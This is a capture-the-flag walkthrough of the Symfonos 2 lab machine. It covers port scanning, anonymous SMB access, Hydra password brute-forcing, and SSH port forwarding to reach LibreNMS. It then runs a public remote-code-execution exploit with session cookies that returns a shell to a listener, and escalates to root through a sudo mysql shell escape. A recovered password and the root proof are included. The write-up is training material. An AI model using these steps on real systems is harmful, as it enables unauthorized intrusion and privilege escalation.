symfonos2

Nmap

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
|   256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_  256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp  open  http        WebFS httpd 1.21

rabbit hole
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:59:3C:A4 (Oracle VirtualBox virtual NIC)
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

rabbitHole

Host script results:
|_clock-skew: mean: 1h39m49s, deviation: 2h53m12s, median: -10s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos2
|   NetBIOS computer name: SYMFONOS2/x00
|   Domain name: /x00
|   FQDN: symfonos2
|_  System time: 2021-04-13T02:49:58-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-13T07:49:59
|_  start_date: N/A

Enumeration

Smb Enumeration

smbclient -U”anonymous%anonymous” //10.0.2.48/anonymous

you can find the log.txt inside /backup Directory

SSH Bruteforcing

Hydra -l aeolus -P ~/rockyou.txt ftp://10.0.2.48

Found Password

aeolus:sergioteamo

PrivilageEsclation

PortForwording

you can find the port 8080 is running on serverLocalHost ,so to enumerate the port you need to PortForword to your local machine via ssh

ssh -L 3333:127.0.0.1:8080 aeolus@10.0.2.48

After accessing the web server on localhost:8080 through our browser, we can see, that librenms is running. Using searchsploit reveals, that this application is vulnerable to remote code execution, which comes really handy! We log in to the web application by providing the same credentials used for ssh. Downloading the exploit, it requires our cookies, listener ip and port to run. We setup our netcat listener and fire up the exploit:

 python 47044.py http://localhost:3333 "librenms_session=eyJpdiI6InZ1U3U3eTM4NTU2TFdDaTJBdmVjZWc9PSIsInZhbHVlIjoiWjBDVm9CcmlDQVEyUFF0UGpYODBhTE11RDg4TUM2VWtcL2NwMHhVZit3UDlVN0JcLzdHOWFVajZ2TFpcL1l6TCt1NGlwOVhjdVo3cjBPN0w5UHNBM2d0YkE9PSIsIm1hYyI6ImQ0NWE3ZWQ5M2EyNzA1NDZjODg5ZmQzN2JkMDQxNzQ1NWEzNGNjMjY2OWZiN2JkNDBkOGNkM2UyZjEyNjhmODUifQ==; XSRF-TOKEN=eyJpdiI6IjEyZm1ZWlo2dU9MVDJaTmpPZnhYTEE9PSIsInZhbHVlIjoiaG1za3VnZ1JVdk05UFwvUXNTUFF2TUlLVDRpelRmV0prMkU2N3QreWt1NjdaODNjY0pWRUJXTWQ3S3JcL2JtWnYyclpMMWJPY0hOOXY4RW9aaHk4UGU3Zz09IiwibWFjIjoiYjRhNTU0MjYwMzM1OWRjZTQ1MDU1ZGU1NDMwY2E1MDk5N2EzNmYzMTk5NGM5YWY5MTczMzAxMmY3NGQzY2RjNyJ9; PHPSESSID=ern5j06g3mth2e6jn5b1sre5t3" 10.0.2.48 80

got the shell

now by sudo -l command got to know the sql can be executed with root privilage without password

command : sudo mysql -e “/! /bin/bash”

$ sudo -l
Matching Defaults entries for cronus on symfonos2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin/:/usr/local/bin/:/usr/sbin/:/usr/bin/:/sbin/:/bin
User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql
$ sudo mysql -e "/! /bin/bash"
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
    Congrats on rooting symfonos:2!

           ,   ,
         ,-`{-`/
      ,-~ , / {-~~-,
    ,~  ,   ,`,-~~-,`,
  ,`   ,   { {      } }                                             }/
 ;     ,--/`/ /    / /                                     }/      /,/
;  ,-./      / /  { {  (                                  /,;    ,/ ,/
; /   `       } } `, `-`-.___                            / `,  ,/  `,/
 /|         ,`,`    `~.___,---}                         / ,`,,/  ,`,;
  `        { {                                     __  /  ,`/   ,`,;
        /   / /                                 _,`, `{  `,{   `,`;`
       {     } }       /~/         .-:::-.     (--,   ;/ `,}  `,`;
       //._./ /      /` , /      ,:::::::::,     `~;   /},/  `,`;     ,-=-
        `-..-`      /. `  ./_   ;:::::::::::;  __,{     `/  `,`;     {
                   / , ~ . ^ `~`/:::::::::::<<~>-,,`,    `-,  ``,_    }
                /~~ . `  . ~  , .`~~/:::::::;    _-~  ;__,        `,-`
       /`/    /~,  . ~ , '  `  ,  .` /::::;`   <<<~```   ``-,,__   ;
      /` .`/ /` .  ^  ,  ~  ,  . ` . ~/~                       //, `,__
     / ` , ,`/.  ` ~  ,  ^ ,  `  ~ . . ``~~~`,                   `-`--, /
    / , ~ . ~ / , ` .  ^  `  , . ^   .   , ` .`-,___,---,__            ``
  /` ` . ~ . ` `/ `  ~  ,  .  ,  `  ,  . ~  ^  ,  .  ~  , .`~---,___
/` . `  ,  . ~ , /  `  ~  ,  .  ^  ,  ~  .  `  ,  ~  .  ^  ,  ~  .  `-,